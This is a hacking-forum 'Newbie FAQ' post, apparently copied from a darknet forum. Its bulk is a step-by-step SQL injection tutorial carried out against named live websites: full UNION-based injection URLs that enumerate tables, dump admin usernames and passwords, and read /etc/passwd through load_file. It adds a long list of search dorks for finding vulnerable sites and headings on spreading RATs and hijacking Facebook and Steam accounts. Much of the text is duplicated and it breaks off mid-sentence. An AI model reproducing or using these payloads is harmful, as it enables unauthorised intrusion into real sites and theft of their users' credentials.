Newbie FAQ 03-17-2013, 03:21 AM
#1
Newbie FAQ
I didn't write any of this.
Based off of Darknet hacking forum. For the sake of keeping advertising away, I won't mention the name of the forum. But if you have ever gone on the deepweb, you know which one it is.
Please +Rep and show gratification.
No hate - be respectful.
Posted this on another forum as well, so yeah.
What programming languages should I start with?
How do I hack a website?
- SQL: Written by Psiber_Syn
0x00
In this lesson we will be covering the basics of a common SQL injection. We will begin with finding the vulnerability and eventually exploiting it to "hack" the website. There are a few things that you all must know before we begin. first this will be a live action lesson, meaning the sites displayed and used for example are live sites and are not under the control or ownership of anyone related to Enigmagroup (where this was originally posted). This being said you may opt to either not participate in the examples or load up your proxy and hack away with the rest of us. Secondly there are a few programs that you may choose to use but are not required it only makes the job a little easier. These things being Firefox and the Hackbar addon. So without further ado, let’s get hacking.
0x01
In the beginning SQL or (structured query language) comes in a few different forms. MYSQL, MSSQL are the most widely used versions but there are others. Today we will focus on MYSQL. The differences in the other versions are mainly syntax and formatting. So in theory once you learn one way it is easy to adapt to the other version simply by changing your injections around a little. SQL is a database computer language designed for managing data in relational database management systems (RDBMS). This being said it is simply a means of extracting information from a database. For example, if we had a collection of books all from different authors. But we only want to view the ones from the author "Tolkien" a simple query would look like this
SELECT Title FROM Books WHERE Author = "Tolkien"
This would display exactly what it says all the books that are written by Tolkien in our current list of books. This is the premise for exploiting the vulnerability in the language.
0x02
SQL vulnerabilities occur when a programmer allows the input of escape characters in which allows arbitrary code to be executed. A programmer whom does not sanitize their user inputs is asking to be hacked. By sanitize I mean he/she does not filter what the user is allowed to input and communicate to the server with. For example if the user does not filter out the <>'s characters then they could easily be susceptible to XSS injections but that is for another lesson. The main solution here is to learn to sanitize all user inputs. NEVER trust an end user to input the proper information; always check them with some form of validation.
0x03
Things you should know are the main comment characters used within MySQL statements. These are as follows --, /*, # these are much like any other comment characters in programming languages it allows what follows to not be executed and is mainly for the programmer to explain or comment on the code written either telling them how it works or what parameters are needed etcetc. Next we need to identify the parameters available for a SQL attack. The main things associated with sql injections are the parameters normally given to php or asp or some other language but we will focus on PHP. A parameter like the following
http://www.blah.com/index.php?id=1 is a prime example of a common sql injection starting point. Granted there are TONS of things the programmer can call their parameters but the most used are things like id, category_id, news_item etcetc basically anything you can think of could be vulnerable. Normally the injection takes place in the news or image gallery sections of a website. The news is probably the #1 section that is vulnerable so we will use this for an example. When you see a site with the parameters news.php?id=1 then this is a great spot to try your injection. First I always check to see if anything happens when simply placing a ' after the 1 like news.php?id=1' this should cause an error if the query is not properly sanitized. Further attack methods are ' and 1=1--, ‘ and 1=2-- or some other variant. Notice the comment character after your initial injection. This is to comment out the rest of the query and only injection your part which would do two things. ' and 1=1-- will always return true. Which means the page should load normally, but ' and 1=2-- should cause another error or some other kind of thing like for instance the page not being displayed properly. There are cases where you do not get to see these error and things but that is for an advanced lesson. Also take note that 1=1 or 1=2 does not have to be those numbers you could use anything that would return true such as 'a'='a' you would have to add the 's to make sure it passes to through the statement.
0x04
Now letÂ’s move on to the fun stuff. We have already been given the amount of information that will help us on our journey into the SQL attack. So letÂ’s start with a LIVE site to test our skills.
**** REMEBER THIS IS A REAL SITE TAKE PRECAUTIONS OR DO NOT PARTICIPATE IF YOU DONT WISH TO ****
http://www.itmaasia.com
First we need to do some recon to find our injection point can anyone find the spot we should use to do our injection? The news parameter looks like a good candidate.
http://www.itmaasia.com/news.php?id=1
This is asking the database for all records with the id of 1 to be displayed
Now its time to check if its vulnerable or not. And how do we start doing that ?? with a ' of course. :-)
http://www.itmaasia.com/news.php?id=1'
This gives an error in SQL errors are your bestest friend.
Further investigation to see if the query gets executed you could use
http://www.itmaasia.com/news.php?id=1 and 1=1--
This should load the site like regular change it to
http://www.itmaasia.com/news.php?id=1 and 1=2--
Should give an error or a blank page or something along that nature anything that does not load like the page unmodified.
The AND is an operator meaning show all the pages with id = 1 AND if 1=1-- which it does so it returns true and contrary wise.
So now we know the page is vulnerable. Next lets go on to figuring out how many columns the page has.
Using the ORDER BY command allows us to step into the query to check to see how many columns it has.
http://www.itmaasia.com/news.php?id=1 order by 1--
This is where Hackbar comes in handy
use the load URL button to load the url into hackbar. Now select the 1 at the end of the query and use the + icon to increase the number to 2 repeat this process until an error has occurred.
http://www.itmaasia.com/news.php?id=1 order by 2--
http://www.itmaasia.com/news.php?id=1 order by 3--
and so on using this method the amount BEFORE the error is how many columns it has not the number that causes the error. so if it errors at "order by 28--" then the amount of columns is 27.
Also something that may be a little advanced is multiple errors sometimes. I Always use
"order by 9999—“ first because unless the site has 9999 columns which would be unheard of then this is your true error. Which means any other errors you get while searching that are not identical to this error are false positives.
So have we found the amount of columns yet?
http://www.itmaasia.com/news.php?id=1 order by 28--
this causes our first "Unknown column" error
so the proper amount of columns is 27
So next we need to set up our UNION statement.
0x05
The UNION operator is Nothing more than a way to ask for more than 1 query at the same time. In essence this is the command after the first command. The use of ALL with UNION allows the return of ALL records matching if this is not used then the UNION will only return distinct results meaning it does not return duplicate values if any exist. we shall use "UNION ALL". Now when using UNION operators you must also use the SELECT statement because we are selecting data from the database. This being said we should now be up to
http://www.itmaasia.com/news.php?id=1 UNION ALL SELECT --
To make this work to our benefit first we will want to only display our results. Meaning we do not want to see what is on the page with ID =1. So we need only select a valid result that is not included in the database. Like for instance -1 or again 9999 which in this case could be used in LARGE databases or you could also use NULL. Now NULL normally shouldnt exist so lets use that.
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT --
Now this will only return our data as long as null is not a result Granted this is not a complete injection its only a projection of where we are at.
Next is where our hard work pays off remember that Magical column number we found this is where we use it to use the union all select we will need to specify our amount of columns. If the original query was selecting 4 columns then it would be easier LOL BUT, this is where hackbar comes in handy again. With the URL loaded in hackbar you can use the sql icon to add a union select statement. then "rewrite" if necessary to look something like this
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Now With this command we get our FIRST glance at what the site is pulling from the database. We should see two things on this page
HOME >> Exhibitors List >> 3
11
Now what this tells us is that its pulling data from the database and displaying it in COLUMNS 3 and 11. That means for us to "SEE" the output of our query we are gonna have to use one of those columns to display it back to us. Column 3 would be probably the title of the news item and 11 would more than likely be the info that goes along with it for argument sake anyway. So taking this into consideration lets do some explaining. The column numbers are not actually numbers at all the 1,2,3,4 are more or less place holders. The , is the real column so dont forget your commas thats what the sql is looking for, whats between them dont really matter. Some times in certain injection you may get an error with data type mismatching There are ways around that that may. By using the cast() function you could change the fact that column 2 only allows to display a string so you could use the CAST(3 as nvarchar) function instead of the 3 in your injection and it would allow it to be displayed you can also use '3' in place of the 3 to accomplish the same thing.
To prove a point I will touch on the CHAR() function now
The Char() function interprets each value as an integer and returns a string based on the given characters by the code values of those integers. Lets go back to hackbar for an example highlight the number 3 in your injection and select the sql icon -> MYSQL ->MYSQL CHAR() and the injection Changes to this
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,CHAR(51),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
now to us it has not really changed. now try using this instead
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,CHAR(83, 89, 78),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
now notice anything different? :-)
This can come in handy later.
Anyway.
0x06
Now that we have achieved our goal so far we will need to complete a few more steps to officially "HACK" this site. Now we have to get some data from the database. We need to gather information from the server about itself, this can easily be accomplished with a few basic questions.
The things we need to know are the user(), version(), and database(). we can do it a few different ways.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
This displays
citme_wanhu@localhost
which is the user @localhost
we could also accomplish it if we put it in the 11 column
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
I like the 11 column because it is displayed by itself so lets use that one from now on.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
we could change user() with version() and database() and do it that way or we could use our friend concat()
This allows you to combine to requests into the same column.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(user(),version(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
This displays
citme_wanhu@localhost5.1.33-communityexhibition
now to me thats jumbled so lets add some "FLAIR" to our injection through the usage of HEX values.
concat(user(),0x3a,database(),0x3a,version()) this is basic the 0x3a is the hex value of the : character. to start using hex in the sql statement you must preceded it with 0x so a little more advanced would be
concat(user(),0x203a20,database(),0x203a20,version()) this will pad the : with spaces on each side because 0x20 is the hex value for the space character.
now here is a more advanced injection
concat(0x7c20526573756c74733a20,0x56657273696f6e3a20,version(),0x3a20,0x44617461626173653a20,database(),0x3a20,0x557365723a20,user(),0x207c,0x2020203a3a3a205073696265725f53796e203a3a3a)
try that and see what you get :-)
now depending on the version you have a new path to choose.
it the version returns 4 something then the information_schema is not available so you will have to guess or use another method for the getting the tablenames. This will not be covered.
Now if it returns version 5 we are relieved cause it makes it that much easier. INFORMATION_SCHEMA is a database that contains the information about the current users database. For instance it contains all the table_names and column_names that the current user has created. It also hold a lot of other data like privileges, triggers, character_sets etcetc. The schema also has different "chapters to it" information_schema.tables is all the table information likewise information_schema.columns holds the column information and so on. so the things we need to hack this site are the column names and the table names mainly. we are not going into multiple databases here this time.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES--
would begin to display the tablenames contained in the database.
to go through them you would use the limit function like
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 0,1--
changing the 0 to 1 lets you step through the table_names
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 74,1-- would be the last table-name as anything further and it gives a blank page or errors.
normally when you reach the lowercase table_names youve hit the user created tables.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 28,1-- starts the user created table list. we see some good ones in there tb_admin, user, members etcetc. lets just focus on the admin
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 31,1--
now there are a few ways to do this next step also just this is what works for me 90% of the time.
by changing the "chapter" in the info_schema you can see the column names just like the table names
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(0x5461626c65204e616d653a20,table_name,0x2020436f6c756d6e204e616d653a20,column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.columns limit 338,1--
notice I added the concat and fancied it up a bit and left in tablename that way I dont get lost cause as you can see there are hundreds of records to sort through at limit 338 here we begin in the tb_admin table
admin_id
username
password
these are the columns we mainly care about. As you can see this user put a great deal amount of thinking into naming his columns here he is asking to get hacked to me.
Before I move on I also want to explain the Group_concat() method
It does much the same as a regular concat but if there is more than just one item like we have here then you would have to use limits to step through the individual tables and columns. Well im lazy and this takes time :-P enter group_concat()
Using the same injection
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES—
we want to skip the whole limiting part and just see the entire list
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES—
as you see this will begin listing all the table names one after another BUT when it gets to the side it cuts off the rest what are we gonna do?? Using our new found knowledge of hex values we will insert a new line character
news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(table_name,0x0d0a),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES--
0x0d0a is the hex values for \r\n or <br> so now we get the entire list in a nice readable fashion. Quick fast and to the point. Now there are times where this will not work properly and you would have to use the limit technique so donÂ’t forget what you have learned.
0x07
Since we now know the amount of columns, table name, and column name the site is pretty much owned. with the use of this injection you will see your results
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(0x61646d696e5f69643a20,admin_id,0x20757365726e616d653a20,username,0x2070617373776f72643a20, password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM tb_admin --
0x08
Now just crack the password hash and thats it. the site is theoretically yours.
ONLY ONE OTHER THING. finding the admin panel or login spots now that will have to be up to you there is no easy way to find these you would have to check all the known admin directories or just guess. This information will not be included. Sorry your on your own.
0x09
A short explanation of the load_file() function
**** ALSO A LiVE SITE SO BEWARE ****
http://photos.surfline.com/view_image.ph...0,31,32,33--
this site looks much like any other injection except that we are using the load_file() function
LOAD_FILE(0x2f6574632f706173737764)
this does what it looks like it loads a file from their server into the injection. you will more than likely have to use hex or char or something to use loadfile the one there loads the /etc/passwd file from the site. there are also others that you could load for example the httpd.conf which is located at
/etc/httpd/conf/httpd.conf or in hex 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66 there are others that would help you tremendously such as poisoning logs to put up a shell or viewing the admin login page theres tons of things you can view essentially every file on the server accessible. But these methods are for a later lesson.
0x10
In conclusion I hope that we all learned something and I have shed some light on to the world of sql injections and hacking in general. I would like to thank Enigmgroup for their patience and expertise and I would like to thank the many users who visit the site religiously.
Dorks:
index.php?id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
news-full.php?id=
news_display.php?getid=
index2.php?option=
material.php?id=
viewapp.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
art.php?idm=
title.php?id=
- LFI
- XXS
How do I Crack WEP/WPA?
- Cracking with BT (w.e version you are using)
How do I spread my RAT/Bot?
There are many ways of spreading (obviously), but these are the most common.... and easy
Spreading with Youtube
Spreading with Torrents
Hacking Facebook Accounts
Hacking Minecraft
Hacking Steam
I didn't write any of this.
Based off of Darknet hacking forum. For the sake of keeping advertising away, I won't mention the name of the forum. But if you have ever gone on the deepweb, you know which one it is.
Please +Rep and show gratification.
No hate - be respectful.
Posted this on another forum as well, so yeah.
What programming languages should I start with?
Spoiler:
- PHP = Scripts to perform various functions, or just writing up your own shell
- Python = General purpose scripting language
- C/C++ = Malware and general purpose programming languages
Darknet Librabry on Computing: http://am4wuhz3zifexz5u.onion/Library/En...Computing/ (You need Tor to open this website)
- Python = General purpose scripting language
- C/C++ = Malware and general purpose programming languages
Darknet Librabry on Computing: http://am4wuhz3zifexz5u.onion/Library/En...Computing/ (You need Tor to open this website)
How do I hack a website?
- SQL: Written by Psiber_Syn
Spoiler:
0x00
In this lesson we will be covering the basics of a common SQL injection. We will begin with finding the vulnerability and eventually exploiting it to "hack" the website. There are a few things that you all must know before we begin. first this will be a live action lesson, meaning the sites displayed and used for example are live sites and are not under the control or ownership of anyone related to Enigmagroup (where this was originally posted). This being said you may opt to either not participate in the examples or load up your proxy and hack away with the rest of us. Secondly there are a few programs that you may choose to use but are not required it only makes the job a little easier. These things being Firefox and the Hackbar addon. So without further ado, let’s get hacking.
0x01
In the beginning SQL or (structured query language) comes in a few different forms. MYSQL, MSSQL are the most widely used versions but there are others. Today we will focus on MYSQL. The differences in the other versions are mainly syntax and formatting. So in theory once you learn one way it is easy to adapt to the other version simply by changing your injections around a little. SQL is a database computer language designed for managing data in relational database management systems (RDBMS). This being said it is simply a means of extracting information from a database. For example, if we had a collection of books all from different authors. But we only want to view the ones from the author "Tolkien" a simple query would look like this
SELECT Title FROM Books WHERE Author = "Tolkien"
This would display exactly what it says all the books that are written by Tolkien in our current list of books. This is the premise for exploiting the vulnerability in the language.
0x02
SQL vulnerabilities occur when a programmer allows the input of escape characters in which allows arbitrary code to be executed. A programmer whom does not sanitize their user inputs is asking to be hacked. By sanitize I mean he/she does not filter what the user is allowed to input and communicate to the server with. For example if the user does not filter out the <>'s characters then they could easily be susceptible to XSS injections but that is for another lesson. The main solution here is to learn to sanitize all user inputs. NEVER trust an end user to input the proper information; always check them with some form of validation.
0x03
Things you should know are the main comment characters used within MySQL statements. These are as follows --, /*, # these are much like any other comment characters in programming languages it allows what follows to not be executed and is mainly for the programmer to explain or comment on the code written either telling them how it works or what parameters are needed etcetc. Next we need to identify the parameters available for a SQL attack. The main things associated with sql injections are the parameters normally given to php or asp or some other language but we will focus on PHP. A parameter like the following
http://www.blah.com/index.php?id=1 is a prime example of a common sql injection starting point. Granted there are TONS of things the programmer can call their parameters but the most used are things like id, category_id, news_item etcetc basically anything you can think of could be vulnerable. Normally the injection takes place in the news or image gallery sections of a website. The news is probably the #1 section that is vulnerable so we will use this for an example. When you see a site with the parameters news.php?id=1 then this is a great spot to try your injection. First I always check to see if anything happens when simply placing a ' after the 1 like news.php?id=1' this should cause an error if the query is not properly sanitized. Further attack methods are ' and 1=1--, ‘ and 1=2-- or some other variant. Notice the comment character after your initial injection. This is to comment out the rest of the query and only injection your part which would do two things. ' and 1=1-- will always return true. Which means the page should load normally, but ' and 1=2-- should cause another error or some other kind of thing like for instance the page not being displayed properly. There are cases where you do not get to see these error and things but that is for an advanced lesson. Also take note that 1=1 or 1=2 does not have to be those numbers you could use anything that would return true such as 'a'='a' you would have to add the 's to make sure it passes to through the statement.
0x04
Now letÂ’s move on to the fun stuff. We have already been given the amount of information that will help us on our journey into the SQL attack. So letÂ’s start with a LIVE site to test our skills.
**** REMEBER THIS IS A REAL SITE TAKE PRECAUTIONS OR DO NOT PARTICIPATE IF YOU DONT WISH TO ****
http://www.itmaasia.com
First we need to do some recon to find our injection point can anyone find the spot we should use to do our injection? The news parameter looks like a good candidate.
http://www.itmaasia.com/news.php?id=1
This is asking the database for all records with the id of 1 to be displayed
Now its time to check if its vulnerable or not. And how do we start doing that ?? with a ' of course. :-)
http://www.itmaasia.com/news.php?id=1'
This gives an error in SQL errors are your bestest friend.
Further investigation to see if the query gets executed you could use
http://www.itmaasia.com/news.php?id=1 and 1=1--
This should load the site like regular change it to
http://www.itmaasia.com/news.php?id=1 and 1=2--
Should give an error or a blank page or something along that nature anything that does not load like the page unmodified.
The AND is an operator meaning show all the pages with id = 1 AND if 1=1-- which it does so it returns true and contrary wise.
So now we know the page is vulnerable. Next lets go on to figuring out how many columns the page has.
Using the ORDER BY command allows us to step into the query to check to see how many columns it has.
http://www.itmaasia.com/news.php?id=1 order by 1--
This is where Hackbar comes in handy
use the load URL button to load the url into hackbar. Now select the 1 at the end of the query and use the + icon to increase the number to 2 repeat this process until an error has occurred.
http://www.itmaasia.com/news.php?id=1 order by 2--
http://www.itmaasia.com/news.php?id=1 order by 3--
and so on using this method the amount BEFORE the error is how many columns it has not the number that causes the error. so if it errors at "order by 28--" then the amount of columns is 27.
Also something that may be a little advanced is multiple errors sometimes. I Always use
"order by 9999—“ first because unless the site has 9999 columns which would be unheard of then this is your true error. Which means any other errors you get while searching that are not identical to this error are false positives.
So have we found the amount of columns yet?
http://www.itmaasia.com/news.php?id=1 order by 28--
this causes our first "Unknown column" error
so the proper amount of columns is 27
So next we need to set up our UNION statement.
0x05
The UNION operator is Nothing more than a way to ask for more than 1 query at the same time. In essence this is the command after the first command. The use of ALL with UNION allows the return of ALL records matching if this is not used then the UNION will only return distinct results meaning it does not return duplicate values if any exist. we shall use "UNION ALL". Now when using UNION operators you must also use the SELECT statement because we are selecting data from the database. This being said we should now be up to
http://www.itmaasia.com/news.php?id=1 UNION ALL SELECT --
To make this work to our benefit first we will want to only display our results. Meaning we do not want to see what is on the page with ID =1. So we need only select a valid result that is not included in the database. Like for instance -1 or again 9999 which in this case could be used in LARGE databases or you could also use NULL. Now NULL normally shouldnt exist so lets use that.
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT --
Now this will only return our data as long as null is not a result Granted this is not a complete injection its only a projection of where we are at.
Next is where our hard work pays off remember that Magical column number we found this is where we use it to use the union all select we will need to specify our amount of columns. If the original query was selecting 4 columns then it would be easier LOL BUT, this is where hackbar comes in handy again. With the URL loaded in hackbar you can use the sql icon to add a union select statement. then "rewrite" if necessary to look something like this
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
Now With this command we get our FIRST glance at what the site is pulling from the database. We should see two things on this page
HOME >> Exhibitors List >> 3
11
Now what this tells us is that its pulling data from the database and displaying it in COLUMNS 3 and 11. That means for us to "SEE" the output of our query we are gonna have to use one of those columns to display it back to us. Column 3 would be probably the title of the news item and 11 would more than likely be the info that goes along with it for argument sake anyway. So taking this into consideration lets do some explaining. The column numbers are not actually numbers at all the 1,2,3,4 are more or less place holders. The , is the real column so dont forget your commas thats what the sql is looking for, whats between them dont really matter. Some times in certain injection you may get an error with data type mismatching There are ways around that that may. By using the cast() function you could change the fact that column 2 only allows to display a string so you could use the CAST(3 as nvarchar) function instead of the 3 in your injection and it would allow it to be displayed you can also use '3' in place of the 3 to accomplish the same thing.
To prove a point I will touch on the CHAR() function now
The Char() function interprets each value as an integer and returns a string based on the given characters by the code values of those integers. Lets go back to hackbar for an example highlight the number 3 in your injection and select the sql icon -> MYSQL ->MYSQL CHAR() and the injection Changes to this
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,CHAR(51),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
now to us it has not really changed. now try using this instead
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,CHAR(83, 89, 78),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
now notice anything different? :-)
This can come in handy later.
Anyway.
0x06
Now that we have achieved our goal so far we will need to complete a few more steps to officially "HACK" this site. Now we have to get some data from the database. We need to gather information from the server about itself, this can easily be accomplished with a few basic questions.
The things we need to know are the user(), version(), and database(). we can do it a few different ways.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
This displays
citme_wanhu@localhost
which is the user @localhost
we could also accomplish it if we put it in the 11 column
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
I like the 11 column because it is displayed by itself so lets use that one from now on.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
we could change user() with version() and database() and do it that way or we could use our friend concat()
This allows you to combine to requests into the same column.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(user(),version(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
This displays
citme_wanhu@localhost5.1.33-communityexhibition
now to me thats jumbled so lets add some "FLAIR" to our injection through the usage of HEX values.
concat(user(),0x3a,database(),0x3a,version()) this is basic the 0x3a is the hex value of the : character. to start using hex in the sql statement you must preceded it with 0x so a little more advanced would be
concat(user(),0x203a20,database(),0x203a20,version()) this will pad the : with spaces on each side because 0x20 is the hex value for the space character.
now here is a more advanced injection
concat(0x7c20526573756c74733a20,0x56657273696f6e3a20,version(),0x3a20,0x44617461626173653a20,database(),0x3a20,0x557365723a20,user(),0x207c,0x2020203a3a3a205073696265725f53796e203a3a3a)
try that and see what you get :-)
now depending on the version you have a new path to choose.
it the version returns 4 something then the information_schema is not available so you will have to guess or use another method for the getting the tablenames. This will not be covered.
Now if it returns version 5 we are relieved cause it makes it that much easier. INFORMATION_SCHEMA is a database that contains the information about the current users database. For instance it contains all the table_names and column_names that the current user has created. It also hold a lot of other data like privileges, triggers, character_sets etcetc. The schema also has different "chapters to it" information_schema.tables is all the table information likewise information_schema.columns holds the column information and so on. so the things we need to hack this site are the column names and the table names mainly. we are not going into multiple databases here this time.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES--
would begin to display the tablenames contained in the database.
to go through them you would use the limit function like
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 0,1--
changing the 0 to 1 lets you step through the table_names
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 74,1-- would be the last table-name as anything further and it gives a blank page or errors.
normally when you reach the lowercase table_names youve hit the user created tables.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 28,1-- starts the user created table list. we see some good ones in there tb_admin, user, members etcetc. lets just focus on the admin
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 31,1--
now there are a few ways to do this next step also just this is what works for me 90% of the time.
by changing the "chapter" in the info_schema you can see the column names just like the table names
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(0x5461626c65204e616d653a20,table_name,0x2020436f6c756d6e204e616d653a20,column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.columns limit 338,1--
notice I added the concat and fancied it up a bit and left in tablename that way I dont get lost cause as you can see there are hundreds of records to sort through at limit 338 here we begin in the tb_admin table
admin_id
username
password
these are the columns we mainly care about. As you can see this user put a great deal amount of thinking into naming his columns here he is asking to get hacked to me.
Before I move on I also want to explain the Group_concat() method
It does much the same as a regular concat but if there is more than just one item like we have here then you would have to use limits to step through the individual tables and columns. Well im lazy and this takes time :-P enter group_concat()
Using the same injection
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES—
we want to skip the whole limiting part and just see the entire list
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES—
as you see this will begin listing all the table names one after another BUT when it gets to the side it cuts off the rest what are we gonna do?? Using our new found knowledge of hex values we will insert a new line character
